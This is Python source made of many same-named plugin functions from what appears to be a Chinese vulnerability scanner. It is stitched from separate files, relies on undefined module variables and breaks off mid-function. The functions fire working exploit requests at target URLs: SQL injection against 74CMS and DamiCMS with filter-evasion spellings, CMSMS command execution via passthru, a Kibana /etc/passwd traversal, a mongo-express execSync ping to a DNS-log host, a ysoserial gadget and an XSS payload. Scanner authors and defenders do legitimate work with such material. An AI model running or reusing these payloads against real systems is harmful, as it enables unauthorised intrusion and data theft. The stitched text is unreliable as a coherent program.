def medusa(Url, RandomAgent, Token, proxies=None):
    """Probe one target for the Yonyou OA cm_info_content SQL-injection marker.

    Sends a single GET for the module-level ``payload`` path and treats the
    string ``bbbmicrosoft`` in the lower-cased response body as a match.
    A match is recorded through ``VulnerabilityDetails(...).Write()`` and
    ``WriteFile().result()``; any exception goes to the error handlers.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        Token: Forwarded to ``VulnerabilityDetails`` together with the finding.
        proxies: Proxy setting, normalised by ``ClassCongregation.Proxies``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        base = scheme + "://" + url + ':' + str(port)
        payload_url = base + payload
        request_headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        # verify=False: the target's TLS certificate is not validated.
        response = requests.get(payload_url,
                                headers=request_headers,
                                proxies=proxies,
                                timeout=5,
                                verify=False)
        body = response.text
        if 'bbbmicrosoft' in body.lower():
            Medusa = "{}存在用友OA_cm_info_content_sqli存在sql注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
                url, payload_url)
            finding = VulnerabilityInfo(Medusa)
            # Pass in the url and the scan data.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, Token).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Call the log-writer class.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url,RandomAgent,UnixTimestamp):
    """Check one target for the CMSMS command-execution finding.

    POSTs a fixed form body to ``editusertag.php`` and reports a finding when
    the response body contains the expected JSON success fragment. The form
    body asks the target to run ``dir``, so this is an intrusive check.

    Args:
        Url: Target URL, split by ``ClassCongregation.UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Forwarded to ``VulnerabilityDetails`` with the finding.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4"
        data = "_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + payload
        request_headers = {
            'User-Agent': RandomAgent,
            "Accept": "*/*",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
            "Content-Length": "115",
            "Connection": "close",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache"
        }
        session = requests.session()
        # verify=False: the target's TLS certificate is not validated.
        response = session.post(payload_url, data=data, headers=request_headers,
                                timeout=6, verify=False)
        body = response.text
        if '{"response":"Success","details":"}' in body:
            Medusa = "{}存在CMSMS任意命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,body)
            finding = VulnerabilityInfo(Medusa)
            # Pass in the url and the scan data.
            ClassCongregation.VulnerabilityDetails(finding.info, url,UnixTimestamp).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        # Call the log-writer class with the URL and the failing plugin name.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check one target for the Weaver (泛微) database-config disclosure marker.

    Sends one GET for the module-level ``payload`` path and reports a finding
    when ``datapassword`` appears in the lower-cased response body.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        proxies: Proxy setting, normalised by ``ClassCongregation.Proxies``.
        **kwargs: Forwarded unchanged to ``VulnerabilityDetails``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        base = scheme + "://" + url + ':' + str(port)
        payload_url = base + payload
        request_headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        # verify=False: the target's TLS certificate is not validated.
        response = requests.get(payload_url,
                                headers=request_headers,
                                proxies=proxies,
                                timeout=5,
                                verify=False)
        body = response.text
        if 'datapassword' in body.lower():
            Medusa = "{} 存在泛微数据库配置泄露漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format(
                url, payload_url)
            finding = VulnerabilityInfo(Medusa)
            # Pass in the url and the scan data.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, **kwargs).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Call the log-writer class.
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + plugin_name + " || Target Url:" + url, e)
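def medusa(Url,RandomAgent,ProxyIp):
    """Check one target for the 74CMS ``ajax_common.php`` SQL-injection marker.

    Sends two GET requests that differ only in how the query is encoded and
    reports a finding when either one returns HTTP 200 with the value
    ``c4ca4238a0b923820dcc509a6f75849b`` in the body.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        ProxyIp: Accepted for interface compatibility; not used here.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,md5(1),3%23"
        payload2="/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,md5(1),3%23"
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        marker = 'c4ca4238a0b923820dcc509a6f75849b'

        s = requests.session()
        # verify=False: the target's TLS certificate is not validated.
        resp = s.get(payload_url, headers=headers, timeout=6,  verify=False)
        resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False)
        con = resp.text
        con2 = resp2.text
        # Each status code must come from its own response; pairing the first
        # body with the second response's status would misjudge the result.
        code = resp.status_code
        code2 = resp2.status_code
        if (code == 200 and marker in con) or (code2 == 200 and marker in con2):
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            web=ClassCongregation.VulnerabilityDetails(_t.info)
            # Severity levels: serious = critical, High = high,
            # Intermediate = medium, Low = low.
            web.High()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        # Call the log-writer class with the URL and the failing plugin name.
        ClassCongregation.ErrorLog().Write(url, _)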
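def medusa(Url,RandomAgent,UnixTimestamp):
    """Check one target for the Kibana console path-traversal response.

    Requests ``/api/console/api_server`` with a traversal value in ``apis``
    and reports a finding when the reply is HTTP 500 with the generic
    internal-error JSON body and a ``kbn-name: kibana`` response header.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Forwarded to ``VulnerabilityDetails`` with the finding.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload_url = scheme+'://'+url+':'+str(port)+'/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd'
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        error_body = '{"statusCode":500,"error":"Internal Server Error","message":"An internal server error occurred"}'

        s = requests.session()
        # verify=False: the target's TLS certificate is not validated.
        resp = s.get(payload_url, headers=headers,timeout=5, verify=False)
        con=resp.text
        code = resp.status_code
        # .get() keeps a missing kbn-name header a plain non-match instead of
        # a KeyError that would be logged as a plugin error.
        server_name = resp.headers.get('kbn-name')
        if code == 500 and error_body in con and server_name == "kibana":
            Medusa = "{} 存在任意文件读取漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url,con.encode(encoding='utf-8'))
            _t=VulnerabilityInfo(Medusa)
            # Pass in the url and the scan data.
            ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Call the log-writer class.
        ClassCongregation.ErrorLog().Write(url, _)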


#medusa('http://192.168.0.146','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/4')
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check one target for the Wuche library system registration page.

    Requests ``/5clib/Inuseraction.action?actionkind=reg`` and reports a
    finding when the reply is HTTP 200 and the body contains both
    ``isIdCards()`` and ``addressprompt``.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        Headers: Request headers passed to ``requests.get`` as given.
        proxies: Proxy setting, normalised by ``ClassCongregation.Proxies``.
        **kwargs: Forwarded unchanged to ``VulnerabilityDetails``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/5clib/Inuseraction.action?actionkind=reg"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + payload

        # verify=False: the target's TLS certificate is not validated.
        response = requests.get(payload_url,
                                headers=Headers,
                                timeout=6,
                                proxies=proxies,
                                verify=False)
        body = response.text
        status = response.status_code
        if status == 200 and 'isIdCards()' in body and 'addressprompt' in body:
            Medusa = "{}存在五车图书管理系统存在越权添加管理员漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            # Pass in the url and the scan data.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, **kwargs).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Call the log-writer class.
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + plugin_name + " || Target Url:" + url, e)
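def medusa(Url,RandomAgent,UnixTimestamp):
    """Check one target for the Struts2 remote-code-execution finding.

    Requests ``/user.action?`` followed by the module-level ``payload`` and
    reports a finding when the reply is HTTP 200 and the lower-cased body
    contains both ``root`` and ``/bin/bash``.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Forwarded to ``VulnerabilityDetails`` with the finding.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    payload_url = scheme+"://"+url+':'+str(port)+'/user.action?'+payload
    host=url+':'+str(port)
    # NOTE(review): a fixed Content-Length is declared although the request
    # below is a GET without a body - confirm this header is intended.
    headers = {
        'Host':host,
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent':RandomAgent,
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Content-Length': '571',
        'DNT': '1',
        'Upgrade-Insecure-Requests': '1'
    }
    try:
        s = requests.session()
        # verify=False: the target's TLS certificate is not validated.
        resp = s.get(payload_url,headers=headers, timeout=5, verify=False)
        con = resp.text.lower()
        code = resp.status_code
        if code == 200 and 'root' in con and '/bin/bash' in con:
            Medusa = "{}存在Struts2远程代码执行漏洞 \r\n漏洞详情:\r\n影响版本:2_1_0-2_3_13\r\nPayload:{}\r\n".format(url, payload_url)
            _t = VulnerabilityInfo(Medusa)
            # Pass in the url and the scan data.
            ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception:
        # Exception rather than a bare except, so KeyboardInterrupt and
        # SystemExit still stop the scan instead of being logged and dropped.
        _ = VulnerabilityInfo('').info.get('algroup')
        # Call the log-writer class.
        ClassCongregation.ErrorLog().Write(url, _)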
def medusa(Url, RandomAgent, UnixTimestamp):
    """Check one target for the Yonyou OA ICC framework finding.

    For every prefix in the module-level ``urls`` list, requests the prefix
    followed by the module-level ``payload`` and reports a finding when the
    lower-cased body contains ``active internet connections``. Each prefix is
    tried independently; an error on one does not stop the others.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Forwarded to ``VulnerabilityDetails`` with the finding.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    request_headers = {
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'User-Agent': RandomAgent,
    }
    for turl in urls:
        try:
            base = scheme + "://" + url + ':' + str(port)
            payload_url = base + turl + payload
            # verify=False: the target's TLS certificate is not validated.
            response = requests.get(payload_url,
                                    headers=request_headers,
                                    timeout=5,
                                    verify=False)
            body = response.text
            if 'active internet connections' in body.lower():
                Medusa = "{}存在用友OA_ICC系统框架漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
                    url, payload_url)
                finding = VulnerabilityInfo(Medusa)
                # Write to file: url is the target file name, Medusa is the
                # result.
                ClassCongregation.WriteFile().result(str(url), str(Medusa))
                # Pass in the url and the scan data.
                ClassCongregation.VulnerabilityDetails(
                    finding.info, url, UnixTimestamp).Write()
        except Exception as e:
            plugin_name = VulnerabilityInfo('').info.get('algroup')
            ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
            # Call the log-writer class.
            ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, UnixTimestamp):
    """Check one target for the CMSMS directory-traversal finding.

    Requests the image-manager ``images.php`` path with a ``../../`` value
    and reports a finding when the reply is HTTP 200 and the body contains
    none of ``404``, ``Not Found`` or ``未找到``.

    NOTE(review): the match is defined only by the absence of three strings,
    so any other 200 page would also be reported - presumably a source of
    false positives; confirm against real targets.

    Args:
        Url: Target URL, split by ``ClassCongregation.UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Forwarded to ``VulnerabilityDetails`` with the finding.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/lib/filemanager/imagemanager/images.php?deld=../../"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + payload
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        session = requests.session()
        # verify=False: the target's TLS certificate is not validated.
        response = session.get(payload_url, headers=request_headers,
                               timeout=6, verify=False)
        body = response.text
        status = response.status_code
        looks_missing = ('404' in body or 'Not Found' in body
                         or '未找到' in body)
        if status == 200 and not looks_missing:
            Medusa = "{}存在CMSMS目录遍历漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            # Pass in the url and the scan data.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, UnixTimestamp).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Call the log-writer class with the URL and the failing plugin name.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, UnixTimestamp):
    """Check one target for a 74CMS ``ajax_common.php`` SQL error echo.

    Sends one GET with a quote-breaking ``query`` value and reports a finding
    when the reply is HTTP 200 and the body echoes the injected fragment.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Forwarded to ``VulnerabilityDetails`` with the finding.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/plus/ajax_common.php?act=hotword&query=%E4%BC%9A%E8%AE%A1%%27%20and%20w_hot%20like%20%27%1"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + payload
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }

        session = requests.session()
        # verify=False: the target's TLS certificate is not validated.
        response = session.get(payload_url, headers=request_headers,
                               timeout=6, verify=False)
        body = response.text
        status = response.status_code
        if status == 200 and "'会计%' and w_hot like '%1'" in body:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            # Pass in the url and the scan data.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, UnixTimestamp).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        # Call the log-writer class with the URL and the failing plugin name.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, ProxyIp):
    """Check one target for the 74CMS ``ajax_officebuilding.php`` SQL marker.

    Sends one GET and reports a high-severity finding when the reply is
    HTTP 200 and the body contains ``3438d5e3ead84b2effc5ec33ed1239f5``.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        ProxyIp: Accepted for interface compatibility; not used here.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/plus/ajax_officebuilding.php?act=key&key=asd%E9%94%A6%27%20uniounionn%20selselectect" + "%201,2,3,md5(7836457),5,6,7,8,9%23"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + payload
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }

        session = requests.session()
        # verify=False: the target's TLS certificate is not validated.
        response = session.get(payload_url, headers=request_headers,
                               timeout=6, verify=False)
        body = response.text
        status = response.status_code
        if status == 200 and '3438d5e3ead84b2effc5ec33ed1239f5' in body:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            details = ClassCongregation.VulnerabilityDetails(finding.info)
            # Severity levels: serious = critical, High = high,
            # Intermediate = medium, Low = low.
            details.High()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        # Call the log-writer class with the URL and the failing plugin name.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url,RandomAgent,UnixTimestamp):
    """Check one target for the mongo-express remote-code-execution finding.

    POSTs a ``document`` expression to ``/checkValid`` that asks the target
    to ping a host obtained from ``Dnslog``, waits ten seconds, and reports
    a finding when ``dns.result()`` is truthy. The request carries a fixed
    ``Authorization: Basic`` value and is an intrusive check.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Forwarded to ``VulnerabilityDetails`` with the finding.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/checkValid"
        base = scheme + "://" + url +":"+ str(port)
        payload_url = base + payload
        dns=Dnslog()
        data = 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping {}")'.format(dns.dns_host())

        request_headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Authorization': 'Basic YWRtaW46cGFzcw==',
            'Connection': 'close',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Content-Length': '123'
        }
        session = requests.session()
        # verify=False: the target's TLS certificate is not validated.
        session.post(payload_url, data=data, headers=request_headers,
                     timeout=6, verify=False)
        # Give the out-of-band lookup time to arrive before polling for it.
        time.sleep(10)
        if dns.result():
            Medusa = "{} 存在mongo-express远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\npayload:{}".format(url,payload_url,data)
            finding = VulnerabilityInfo(Medusa)
            # Pass in the url and the scan data.
            ClassCongregation.VulnerabilityDetails(finding.info, url,UnixTimestamp).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        # Call the log-writer class with the URL and the failing plugin name.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
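def medusa(Url, RandomAgent, UnixTimestamp):
    """Check one target for the Yonyou A8 log-disclosure finding.

    Requests every path in the module-level ``payloads`` list and reports a
    finding for each response body that contains a
    ``YYYY-MM-DD HH:MM:SS`` style timestamp. Each path is tried
    independently; an error on one does not stop the others.

    NOTE(review): any page that prints a timestamp in this format matches,
    so the check presumably over-reports - confirm against real targets.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Forwarded to ``VulnerabilityDetails`` with the finding.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    # Compiled once; the pattern does not change between payloads.
    timestamp_re = re.compile(
        r"[0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}:[0-9]{2}")
    headers = {
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'User-Agent': RandomAgent,
    }
    for payload in payloads:
        try:
            payload_url = scheme + "://" + url + ':' + str(port) + payload
            # verify=False: the target's TLS certificate is not validated.
            resp = requests.get(payload_url,
                                headers=headers,
                                timeout=5,
                                verify=False)
            con = resp.text
            if timestamp_re.search(con):
                Medusa = "{} 存在用友a8 log泄露漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format(
                    url, payload_url)
                _t = VulnerabilityInfo(Medusa)
                # Pass in the url and the scan data.
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, UnixTimestamp).Write()
                # Write to file: url is the target file name, Medusa is the
                # result.
                ClassCongregation.WriteFile().result(str(url), str(Medusa))
        except Exception:
            # Exception rather than a bare except, so KeyboardInterrupt and
            # SystemExit still stop the scan instead of being logged.
            _ = VulnerabilityInfo('').info.get('algroup')
            # Call the log-writer class.
            ClassCongregation.ErrorLog().Write(url, _)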
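def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Check for the log4j finding labelled CVE-2019-17571 via a DNS log.

    Runs the bundled ``ysoserial.jar`` generator, waits five seconds, and
    reports a finding when ``dns.result()`` is truthy.

    NOTE(review): the generator's output is drained and discarded, and
    nothing in this function sends a request to ``Url``. As written, a
    truthy DNS-log result is therefore not evidence about the target -
    confirm the intended flow before trusting findings from this plugin.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        Headers: Accepted for interface compatibility; not used here.
        proxies: Normalised by ``Proxies`` but not used afterwards.
        **kwargs: Forwarded unchanged to ``VulnerabilityDetails``.
    """
    proxies=Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        dns=Dnslog()
        YsoserialPath=GetToolFilePath().Result()+"ysoserial.jar"
        # The context manager closes the pipe and reaps the child; without it
        # every call leaves an open pipe and an unreaped java process behind.
        with subprocess.Popen(["java", "-jar", YsoserialPath, "CommonsCollections5", "ping "+dns.dns_host()], stdout=subprocess.PIPE) as proc:
            proc.communicate()
        time.sleep(5)
        if dns.result():
            Medusa = "{}存在log4j远程命令执行漏洞(CVE-2019-17571)\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\nDNSlog请求值{}\r\nDNSlog数据{}\r\n".format(url,scheme + "://" + url +":"+ str(port),dns.dns_host(),dns.dns_text())
            _t=VulnerabilityInfo(Medusa)
            # Pass in the url and the scan data.
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Call the log-writer class.
        ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)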
def medusa(Url, RandomAgent, UnixTimestamp):
    """Check one target for the DamiCMS ``ajax_arclist`` SQL-injection marker.

    Sends one GET and reports a finding when the reply is HTTP 200 and the
    body contains ``ca4238a0b923820dcc509a6f75849``.

    Args:
        Url: Target URL, split by ``UrlProcessing().result``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Forwarded to ``VulnerabilityDetails`` with the finding.
    """
    scheme, url, port = UrlProcessing().result(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/index.php?s=/api/ajax_arclist/model/article/field/md5(1)%23"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + payload

        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        session = requests.session()
        # verify=False: the target's TLS certificate is not validated.
        response = session.get(payload_url, headers=request_headers,
                               timeout=6, verify=False)
        body = response.text
        status = response.status_code
        if status == 200 and "ca4238a0b923820dcc509a6f75849" in body:
            Medusa = "{}存在大米CMSSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            # Pass in the url and the scan data.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, UnixTimestamp).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Call the log-writer class with the URL and the failing plugin name.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, ProxyIp):
    """Check one target for the 74CMS ``jobs-list.php`` reflected-XSS echo.

    Sends one GET with an attribute-breaking ``key`` value and, when the
    reply is HTTP 200 and the body reflects it unescaped, records a
    low-severity finding.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        ProxyIp: Accepted for interface compatibility; not used here.

    Returns:
        ``str(_t.info)`` for a match; ``None`` otherwise, including on error.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/jobs/jobs-list.php?key=%22%20autofocus%20onfocus=alert%281%29%20style=%22%22"
        base = scheme + "://" + url + ":" + str(port)
